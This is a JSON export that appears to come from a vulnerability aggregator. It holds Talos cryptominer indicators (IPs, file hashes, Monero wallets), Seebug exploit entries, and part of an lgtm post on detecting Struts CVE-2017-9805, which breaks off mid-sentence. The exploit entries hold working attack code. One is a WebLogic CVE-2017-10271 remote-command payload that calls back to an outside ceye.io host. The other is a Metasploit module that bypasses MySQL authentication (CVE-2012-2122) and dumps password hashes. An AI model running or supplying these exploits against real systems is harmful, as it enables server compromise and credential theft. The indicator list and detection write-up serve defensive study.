\ndcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin \n3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh \na598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db \n74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt \n \nSamples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net: \n17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0 \n4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86 \n \nWallets \nrocke@live.cn \n44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W \n44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3 \n45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV \n88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto \n \n\n\n#### 8220 Gang\n\n45[.]32[.]39[.]40:8220 \n45[.]77[.]24[.]16 \n54[.]37[.]57[.]99:8220 \n67[.]21[.]81[.]179:8220 \n67[.]231[.]243[.]10:8220 \n98[.]142[.]140[.]13:8220 \n98[.]142[.]140[.]13:3333 \n98[.]142[.]140[.]13:8888 \n104[.]129[.]171[.]172:8220 \n104[.]225[.]147[.]196:8220 \n128[.]199[.]86[.]57:8220 \n142[.]4[.]124[.]50:8220 \n142[.]4[.]124[.]164:8220 \n158[.]69[.]133[.]17:8220 \n158[.]69[.]133[.]18:8220 \n158[.]69[.]133[.]20:3333 \n162[.]212[.]157[.]244:8220 \n165[.]227[.]215[.]212:8220 \n185[.]82[.]218[.]206:8220 \n192[.]99[.]142[.]226:8220 \n192[.]99[.]142[.]227 \n192[.]99[.]142[.]232:8220 \n192[.]99[.]142[.]235:8220 \n192[.]99[.]142[.]240:8220 \n192[.]99[.]142[.]248:8220 \n192[.]99[.]142[.]249:3333 \n192[.]99[.]142[.]251:80 \n192[.]99[.]56[.]117:8220 \n195[.]123[.]224[.]186:8220 \n198[.]181[.]41[.]97:8220 \n202[.]144[.]193[.]110:3333 \nhxxps://github[.]com/MRdoulestar/whatMiner \n \n1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13 \ne2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e \n31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1 \ncb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35 \ncfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e \nefbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803 \n384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52 \n \nSamples associated with whatMiner: \nf7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c \n1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7 \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n \nWallets \n41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo \n4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg \n46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S \n \n\n\n#### \n\n#### Tor2mine\n\n107[.]181[.]160[.]197 \n107[.]181[.]174[.]248 \n107[.]181[.]187[.]132 \nasq[.]r77vh0[.]pw \n194[.]67[.]204[.]189 \nqm7gmtaagejolddt[.]onion[.]to \nres1[.]myrms[.]pw \nhxxps://gitlab[.]com/Shtrawban \nrig[.]zxcvb[.]pw \nback123[.]brasilia[.]me \n \n91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe \n44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe \n3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe \nc3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe \n4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1 \n904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat \n4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta \naf780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta \ncc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1 \nee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta \na7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat \n0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php \ne0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat \nb2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1 \n18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin \n1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe \n112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1 \ne1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta \n61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1 \nf1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat \ncce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe \n \n\n\n#### \n\n#### Uncategorized groups\n\n188[.]166[.]38[.]137 \n91[.]121[.]87[.]10 \n94[.]23[.]206[.]130 \n \n46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava \n44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg", "cvss3": {}, "published": "2018-12-18T08:33:00", "type": "talosblog", "title": "Connecting the dots between recently active cryptominers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-12-18T16:33:11", "id": "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2018-06-26T22:23:22", "description": "### \u6f0f\u6d1e\u63cf\u8ff0\r\n \u9ed1\u5ba2\u5229\u7528WebLogic \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3248\uff09\u548cWebLogic WLS \u7ec4\u4ef6\u6f0f\u6d1e\uff08CVE-2017-10271\uff09\u5bf9\u4f01\u4e1a\u670d\u52a1\u5668\u53d1\u8d77\u5927\u8303\u56f4\u8fdc\u7a0b\u653b\u51fb\uff0c\u6709\u5927\u91cf\u4f01\u4e1a\u7684\u670d\u52a1\u5668\u88ab\u653b\u9677\uff0c\u4e14\u88ab\u653b\u51fb\u4f01\u4e1a\u6570\u91cf\u5448\u73b0\u660e\u663e\u4e0a\u5347\u8d8b\u52bf\uff0c\u9700\u8981\u5f15\u8d77\u9ad8\u5ea6\u91cd\u89c6\u3002\u5176\u4e2d\uff0cCVE-2017-10271\u662f\u4e00\u4e2a\u6700\u65b0\u7684\u5229\u7528Oracle WebLogic\u4e2dWLS \u7ec4\u4ef6\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u5c5e\u4e8e\u6ca1\u6709\u516c\u5f00\u7ec6\u8282\u7684\u91ce\u5916\u5229\u7528\u6f0f\u6d1e\uff0c\u5927\u91cf\u4f01\u4e1a\u5c1a\u672a\u53ca\u65f6\u5b89\u88c5\u8865\u4e01\u3002\u5b98\u65b9\u5728 2017 \u5e74 10 \u6708\u4efd\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u3002\r\n \r\n \u8be5\u6f0f\u6d1e\u7684\u5229\u7528\u65b9\u6cd5\u8f83\u4e3a\u7b80\u5355\uff0c\u653b\u51fb\u8005\u53ea\u9700\u8981\u53d1\u9001\u7cbe\u5fc3\u6784\u9020\u7684 HTTP \u8bf7\u6c42\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230\u76ee\u6807\u670d\u52a1\u5668\u7684\u6743\u9650\uff0c\u5371\u5bb3\u5de8\u5927\u3002\u7531\u4e8e\u6f0f\u6d1e\u8f83\u65b0\uff0c\u76ee\u524d\u4ecd\u7136\u5b58\u5728\u5f88\u591a\u4e3b\u673a\u5c1a\u672a\u66f4\u65b0\u76f8\u5173\u8865\u4e01\u3002\u9884\u8ba1\u5728\u6b64\u6b21\u7a81\u53d1\u4e8b\u4ef6\u4e4b\u540e\uff0c\u5f88\u53ef\u80fd\u51fa\u73b0\u653b\u51fb\u4e8b\u4ef6\u6570\u91cf\u6fc0\u589e\uff0c\u5927\u91cf\u65b0\u4e3b\u673a\u88ab\u653b\u9677\u7684\u60c5\u51b5\u3002\r\n\t\r\n \u653b\u51fb\u8005\u80fd\u591f\u540c\u65f6\u653b\u51fbWindows\u53caLinux\u4e3b\u673a\uff0c\u5e76\u5728\u76ee\u6807\u4e2d\u957f\u671f\u6f5c\u4f0f\u3002\u7531\u4e8eOracle WebLogic\u7684\u4f7f\u7528\u9762\u8f83\u4e3a\u5e7f\u6cdb\uff0c\u653b\u51fb\u9762\u6d89\u53ca\u5404\u4e2a\u884c\u4e1a\u3002\u6b64\u6b21\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6728\u9a6c\u4e3a\u5178\u578b\u7684\u6bd4\u7279\u5e01\u6316\u77ff\u6728\u9a6c\u3002\u4f46\u8be5\u6f0f\u6d1e\u53ef\u88ab\u9ed1\u5ba2\u7528\u4e8e\u5176\u5b83\u76ee\u7684\u653b\u51fb\u3002\r\n \r\n### \u5f71\u54cd\u7248\u672c\r\n\r\n* Oracle Weblogic Server 10.3.6.0\r\n\r\n* Oracle Weblogic Server 12.2.1.2\r\n\r\n* Oracle Weblogic Server 12.2.1.1\r\n\r\n* Oracle Weblogic Server 12.1.3.0", "cvss3": {}, "published": "2017-12-22T00:00:00", "type": "seebug", "title": "Oracle WebLogic wls-wsat RCE(CVE-2017-10271)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3248"], "modified": "2017-12-22T00:00:00", "id": "SSV:97009", "href": "https://www.seebug.org/vuldb/ssvid-97009", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport random\r\nimport string\r\nimport urlparse\r\nimport time\r\n\r\nfrom pocsuite.api.request import req\r\nfrom pocsuite.api.poc import register\r\nfrom pocsuite.api.poc import Output, POCBase\r\nfrom pocsuite.lib.core.data import logger\r\n\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '97009'\r\n version = '1'\r\n author = ''\r\n vulDate = '2017-10-23'\r\n createDate = '2017-12-22'\r\n updateDate = '2017-12-22'\r\n references = [\r\n 'https://www.seebug.org/vuldb/ssvid-97009',\r\n ]\r\n name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'\r\n appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'\r\n appName = 'WebLogic'\r\n appVersion = ''\r\n vulType = 'Remote Command Execution'\r\n desc = '''\r\n Oracle Fusion Middleware\uff08Oracle\u878d\u5408\u4e2d\u95f4\u4ef6\uff09\u662f\u7f8e\u56fd\u7532\u9aa8\u6587\uff08Oracle\uff09\u516c\u53f8\u7684\u4e00\u5957\u9762\u5411\u4f01\u4e1a\u548c\u4e91\u73af\u5883\u7684\u4e1a\u52a1\u521b\u65b0\u5e73\u53f0\u3002\u8be5\u5e73\u53f0\u63d0\u4f9b\u4e86\u4e2d\u95f4\u4ef6\u3001\u8f6f\u4ef6\u96c6\u5408\u7b49\u529f\u80fd\u3002Oracle WebLogic Server\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u9002\u7528\u4e8e\u4e91\u73af\u5883\u548c\u4f20\u7edf\u73af\u5883\u7684\u5e94\u7528\u670d\u52a1\u5668\u7ec4\u4ef6\u3002\r\nOracle Fusion Middleware\u4e2d\u7684Oracle WebLogic Server\u7ec4\u4ef6\u7684WLS Security\u5b50\u7ec4\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u63a7\u5236\u7ec4\u4ef6\uff0c\u5f71\u54cd\u6570\u636e\u7684\u53ef\u7528\u6027\u3001\u4fdd\u5bc6\u6027\u548c\u5b8c\u6574\u6027\u3002\u4ee5\u4e0b\u7ec4\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aOracle WebLogic Server 10.3.6.0.0\u7248\u672c\uff0c12.1.3.0.0\u7248\u672c\uff0c12.2.1.1.0\u7248\u672c\uff0c12.2.1.2.0\u7248\u672c\u3002\r\n\r\n '''\r\n\r\n samples = []\r\n\r\n def verify_request(self, token, type, flag):\r\n retVal = False\r\n counts = 3\r\n url = \"http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}\".format(token=token, type=type, flag=flag)\r\n while counts:\r\n try:\r\n time.sleep(1)\r\n resp = req.get(url)\r\n if resp and resp.status_code == 200 and flag in resp.content:\r\n retVal = True\r\n break\r\n except Exception as ex:\r\n logger.warn(ex.message)\r\n time.sleep(1)\r\n\r\n counts -= 1\r\n\r\n return retVal\r\n\r\n\r\n def test_uri(self, uri):\r\n flag = \"\".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))\r\n headers = {\r\n 'SOAPAction': \"\",\r\n 'Content-Type': 'text/xml;charset=UTF-8'\r\n }\r\n path = '/wls-wsat/CoordinatorPortType11'\r\n url = urlparse.urljoin(uri, path)\r\n postdata = \"\"\"\r\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \r\n <soapenv:Header> \r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \r\n <java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"> \r\n <object class=\"java.lang.ProcessBuilder\"> \r\n <array class=\"java.lang.String\" length=\"2\"> \r\n <void index=\"0\"> \r\n <string>nslookup</string> \r\n </void> \r\n <void index=\"1\"> \r\n <string>{0}.dns.j3170ioc.ceye.io</string> \r\n </void> \r\n </array> \r\n <void method=\"start\"/> \r\n </object> \r\n </java> \r\n </work:WorkContext> \r\n </soapenv:Header> \r\n <soapenv:Body/> \r\n </soapenv:Envelope>\r\n \"\"\".format(flag)\r\n try:\r\n resp = req.post(url, data=postdata, headers=headers)\r\n if resp.status_code == 500 and self.verify_request(token=\"5df9bef9ed0d27df6f8csc1452b99b5b2p\", type=\"dns\", flag=flag):\r\n return True\r\n\r\n except Exception as ex:\r\n logger.warning(ex.message)\r\n return False\r\n\r\n\r\n def _verify(self):\r\n result = {}\r\n pr = urlparse.urlparse(self.url)\r\n ports = [7001]\r\n if pr.port not in ports:\r\n ports.insert(0, pr.port)\r\n for port in ports:\r\n uri = \"{0}://{1}:{2}\".format(pr.scheme, pr.hostname, str(port))\r\n if self.test_uri(uri):\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = uri\r\n break\r\n\r\n return self.parse_output(result)\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def parse_output(self, result):\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\n\r\nregister(TestPOC)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-97009", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:51:42", "description": "No description provided by source.", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "seebug", "title": "MariaDB/MySQL \u6982\u7387\u6027\u4efb\u610f\u5bc6\u7801(\u8eab\u4efd\u8ba4\u8bc1)\u767b\u5f55\u6f0f\u6d1e(CVE-2012-2122)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2012-06-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60198", "id": "SSV:60198", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\ninclude Msf::Exploit::Remote::MYSQL\r\ninclude Msf::Auxiliary::Report\r\n\r\ninclude Msf::Auxiliary::Scanner\r\n\r\ndef initialize\r\nsuper(\r\n'Name' => 'MYSQL CVE-2012-2122 Authentication Bypass Password Dump',\r\n'Version' => '$Revision$',\r\n'Description' => %Q{\r\nThis module exploits a password bypass vulnerability in MySQL in order\r\nto extract the usernames and encrypted password hashes from a MySQL server.\r\nThese hashes ares stored as loot for later cracking.\r\n},\r\n'Authors' => [\r\n'TheLightCosine <thelightcosine[at]metasploit.com>', # Original hashdump module\r\n'jcran' # Authentication bypass bruteforce implementation\r\n],\r\n'References' => [\r\n['CVE', '2012-2122']\r\n],\r\n'DisclosureDate' => 'Jun 09 2012',\r\n'License' => MSF_LICENSE\r\n)\r\n\r\nderegister_options('PASSWORD')\r\nend\r\n\r\n\r\ndef run_host(ip)\r\n\r\n# Keep track of results (successful connections)\r\nresults = []\r\n\r\n# Username and password placeholders\r\nusername = datastore['USERNAME']\r\npassword = Rex::Text.rand_text_alpha(rand(8)+1)\r\n\r\n# Do an initial check to see if we can log into the server at all\r\nbegin\r\nsocket = connect(false)\r\nx = ::RbMysql.connect({\r\n:host => rhost,\r\n:port => rport,\r\n:user => username,\r\n:password => password,\r\n:read_timeout => 300,\r\n:write_timeout => 300,\r\n:socket => socket\r\n})\r\nx.connect\r\nresults << x\r\n\r\nprint_good \"#{rhost}:#{rport} The server accepted our first login as #{username} with a bad password\"\r\n\r\nrescue RbMysql::HostNotPrivileged\r\nprint_error \"#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)\"\r\nreturn\r\nrescue RbMysql::AccessDeniedError\r\nprint_good \"#{rhost}:#{rport} The server allows logins, proceeding with bypass test\"\r\nrescue ::Interrupt\r\nraise $!\r\nrescue ::Exception => e\r\nprint_error \"#{rhost}:#{rport} Error: #{e}\"\r\nreturn\r\nend\r\n\r\n# Short circuit if we already won\r\nif results.length > 0\r\n@mysql_handle = results.first\r\nreturn dump_hashes\r\nend\r\n\r\n\r\n#\r\n# Threaded login checker\r\n#\r\nmax_threads = 16\r\ncur_threads = []\r\n\r\n# Try up to 1000 times just to be sure\r\nqueue = [*(1 .. 1000)]\r\n\r\nwhile(queue.length > 0)\r\nwhile(cur_threads.length < max_threads)\r\n\r\n# We can stop if we get a valid login\r\nbreak if results.length > 0\r\n\r\n# keep track of how many attempts we've made\r\nitem = queue.shift\r\n\r\n# We can stop if we reach 1000 tries\r\nbreak if not item\r\n\r\n\r\n# Status indicator\r\nprint_status \"#{rhost}:#{rport} Authentication bypass is #{item/10}% complete\" if (item % 100) == 0\r\n\r\nt = Thread.new(item) do |count|\r\nbegin\r\n# Create our socket and make the connection\r\ns = connect(false)\r\nx = ::RbMysql.connect({\r\n:host => rhost,\r\n:port => rport,\r\n:user => username,\r\n:password => password,\r\n:read_timeout => 300,\r\n:write_timeout => 300,\r\n:socket => s,\r\n:db => nil\r\n})\r\nprint_status \"#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts\"\r\nresults << x\r\nrescue RbMysql::AccessDeniedError\r\nrescue Exception => e\r\nprint_status \"#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}\"\r\nend\r\nend\r\n\r\ncur_threads << t\r\n\r\nend\r\n\r\n# We can stop if we get a valid login\r\nbreak if results.length > 0\r\n\r\n# Add to a list of dead threads if we're finished\r\ncur_threads.each_index do |ti|\r\nt = cur_threads[ti]\r\nif not t.alive?\r\ncur_threads[ti] = nil\r\nend\r\nend\r\n\r\n# Remove any dead threads from the set\r\ncur_threads.delete(nil)\r\n\r\n::IO.select(nil, nil, nil, 0.25)\r\nend\r\n\r\n# Clean up any remaining threads\r\ncur_threads.each {|x| x.kill }\r\n\r\n\r\nif results.length > 0\r\nprint_good(\"#{rhost}:#{rport} Successful exploited the authentication bypass flaw, dumping hashes...\")\r\n@mysql_handle = results.first\r\nreturn dump_hashes\r\nend\r\n\r\nprint_error(\"#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable\")\r\nend\r\n\r\ndef dump_hashes\r\n\r\n# Grabs the username and password hashes and stores them as loot\r\nres = mysql_query(\"SELECT user,password from mysql.user\")\r\nif res.nil?\r\nprint_error(\"#{rhost}:#{rport} There was an error reading the MySQL User Table\")\r\nreturn\r\n\r\nend\r\n\r\n# Create a table to store data\r\ntbl = Rex::Ui::Text::Table.new(\r\n'Header' => 'MysQL Server Hashes',\r\n'Indent' => 1,\r\n'Columns' => ['Username', 'Hash']\r\n)\r\n\r\nif res.size > 0\r\nres.each do |row|\r\nnext unless (row[0].to_s + row[1].to_s).length > 0\r\ntbl << [row[0], row[1]]\r\nprint_good(\"#{rhost}:#{rport} Saving HashString as Loot: #{row[0]}:#{row[1]}\")\r\nend\r\nend\r\n\r\nthis_service = nil\r\nif framework.db and framework.db.active\r\nthis_service = report_service(\r\n:host => rhost,\r\n:port => rport,\r\n:name => 'mysql',\r\n:proto => 'tcp'\r\n)\r\nend\r\n\r\nreport_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?\r\n\r\nend\r\n\r\n# Stores the Hash Table as Loot for Later Cracking\r\ndef report_hashes(hash_loot,service)\r\nfilename= \"#{rhost}-#{rport}_mysqlhashes.txt\"\r\npath = store_loot(\"mysql.hashes\", \"text/plain\", rhost, hash_loot, filename, \"MySQL Hashes\", service)\r\nprint_status(\"#{rhost}:#{rport} Hash Table has been saved: #{path}\")\r\n\r\nend\r\n\r\nend\r\n\r\n\r\n########################################################################################\r\n\u6d4b\u8bd5\u65b9\u6cd5,2\r\n\r\n#!/usr/bin/python\r\nimport subprocess\r\n\r\nwhile 1:\r\n subprocess.Popen(\"mysql -u root mysql --password=blah\", shell=True).wait()\r\n\r\n\r\n########################################################################################\r\n\u6d4b\u8bd5\u65b9\u6cd5,3\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main(void) {\r\n int one, two, ret;\r\n time_t start = time(0);\r\n time_t now;\r\n\r\n srand(getpid()*start);\r\n while (1) {\r\n one = rand();\r\n two = rand();\r\n ret = memcmp(&one, &two, sizeof(int));\r\n if (ret < -128 || ret > 127)\r\n break;\r\n time(&now);\r\n if (now - start > 10) {\r\n printf(\"Not triggered in 10 seconds, *probably* not vulnerable..\\n\");\r\n return 1;\r\n }\r\n }\r\n printf(\"Vulnerable! memcmp returned: %d\\n\", ret);\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60198", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:02:40", "description": "In this post I'll describe how I customized a standard lgtm query to find a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). A more general announcement about this vulnerability [can be found here](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement). It has been assigned [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805), a security bulletin can be found here on the Struts website, and details of version 2.5.13 of Apache Struts that addresses this vulnerability [are available here](https://struts.apache.org/announce.html). Due to the severe nature of this vulnerability, a couple of details (including a working exploit) have been omitted from this post; this information will be added in a few weeks' time.\r\n\r\nWe strongly advise users of Struts to upgrade to the latest version to mitigate this security risk.\r\n\r\nThe vulnerability I discovered is a result of unsafe deserialization in Java. Multiple similar vulnerabilities have come to light in recent years, after Chris Frohoff and Gabriel Lawrence discovered a deserialization flaw in Apache Commons Collections that can lead to arbitrary code execution. Many Java applications have since been affected by such vulnerabilities. If you'd like to know more about this type of vulnerability, the lgtm documentation page on this topic is a good place to start.\r\n# Detecting unsafe deserialization in Struts #\r\n\r\nlgtm identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection.\r\n\r\nThis query detects common ways through which user-controlled data flows to a deserialization method. However, some projects use a slightly different approach to receive remote user input. For example, Apache Struts uses the ContentTypeHandler interface. This converts data into Java objects. Since implementations of this interface usually deserialize the data passed to them, every class that implements this interface is potentially of interest. The standard QL query for detecting unsafe deserialization of user-controlled data can easily be adapted to recognize this additional method for processing user input. This is done by defining a custom data source.\r\n\r\nIn this case, we are interested in data flowing from the toObject method, which is defined in the ContentTypeHandler interface:\r\n\r\n void toObject(Reader in, Object target);\r\n\r\nThe data contained in the first argument in that is passed to toObject should be considered tainted: it is under the control of a remote user and should not be trusted. We want to find places where this tainted data (the source) flows into a deserialization method (a sink) without input validation or sanitization.\r\n\r\nThe QL DataFlow library provides functionality for tracking tainted data through various steps in the source code. This is known as taint tracking. For example, data gets tracked through various method calls:\r\n\r\n IOUtils.copy(remoteUserInput, output); // output is now also tainted because the function copy preserves the data.\r\n\r\nTo make use of the taint tracking functionality in the DataFlow library, let's define the in argument to ContentTypeHandler.toObject(...) as a tainted source. First, we define how the query should recognize the ContentTypeHandler interface and the method toObject.\r\n\r\n\t/** The ContentTypeHandler Java class in Struts **/\r\n\tclass ContentTypeHandler extends Interface {\r\n\t ContentTypeHandler() {\r\n\t this.hasQualifiedName(\"org.apache.struts2.rest.handler\", \"ContentTypeHandler\")\r\n\t }\r\n\t}\r\n\t\r\n\t/** The method `toObject` */\r\n\tclass ToObjectDeserializer extends Method {\r\n\t ToObjectDeserializer() {\r\n\t this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and\r\n\t this.getSignature = \"toObject(java.io.Reader,java.lang.Object)\"\r\n\t }\r\n\t}\r\n\r\nHere we use getASupertype*() to restrict the matching to any class that has ContentTypeHandler as a supertype.\r\n\r\nNext we want to mark the first argument of the toObject method as an untrusted data source, and track that data as it flows through the code paths. To do that, we extend the FlowSource class in QL's dataflow library:\r\n\r\n\t/** Mark the first argument of `toObject` as a dataflow source **/\r\n\tclass ContentTypeHandlerInput extends FlowSource {\r\n\t ContentTypeHandlerInput() {\r\n\t exists(ToObjectDeserializer des |\r\n\t des.getParameter(0).getAnAccess() = this\r\n\t )\r\n\t }\r\n\t}\r\n\r\nIntuitively, this definition says that any access to the first parameter of a toObject method, as captured by ToObjectDeserializer above, is a flow source. Note that for technical reasons, flow sources have to be expressions. Therefore, we identify all accesses of that parameter (which are expressions) as sources, rather than the parameter itself (which isn't).\r\n\r\nNow that we have the definition for a dataflow source, we can look for places where this tainted data is used in an unsafe deserialization method. We don't have to define that method (the sink) ourselves as it is already in the Deserialization of user-controlled data query (line 64: UnsafeDeserializationSink, we will need to copy its definition into the query console). Using this, our final query becomes:\r\n\r\n\tfrom ContentTypeHandlerInput source, UnsafeDeserializationSink sink\r\n\twhere source.flowsTo(sink)\r\n\tselect source, sink\r\n\r\nHere we use the .flowsTo predicate in FlowSource for tracking so that we only identify the cases when unsafe deserialization is performed on a ContentTypeHandlerInput source.\r\n\r\nWhen I ran the customized query on Struts there was exactly one result (Running it now will yield no result as the fix has been applied). I verified that it was a genuine remote code execution vulnerability before reporting it to the Struts security team. They have been very quick and responsive in working out a solution even though it is a fairly non-trivial task that requires API changes. Due to the severity of this finding I will not disclose more details at this stage. Rather, I will update this blog post in a couple of weeks' time with more information.\r\n# Vendor Response #\r\n\r\n 17 July 2017: Initial disclosure.\r\n 02 August 2017: API changes in preparation for patch.\r\n 14 August 2017: Patch from Struts for review.\r\n 16 August 2017: Vulnerability officially recognized as CVE-2017-9805\r\n 5 September 2017: Struts version 2.5.13 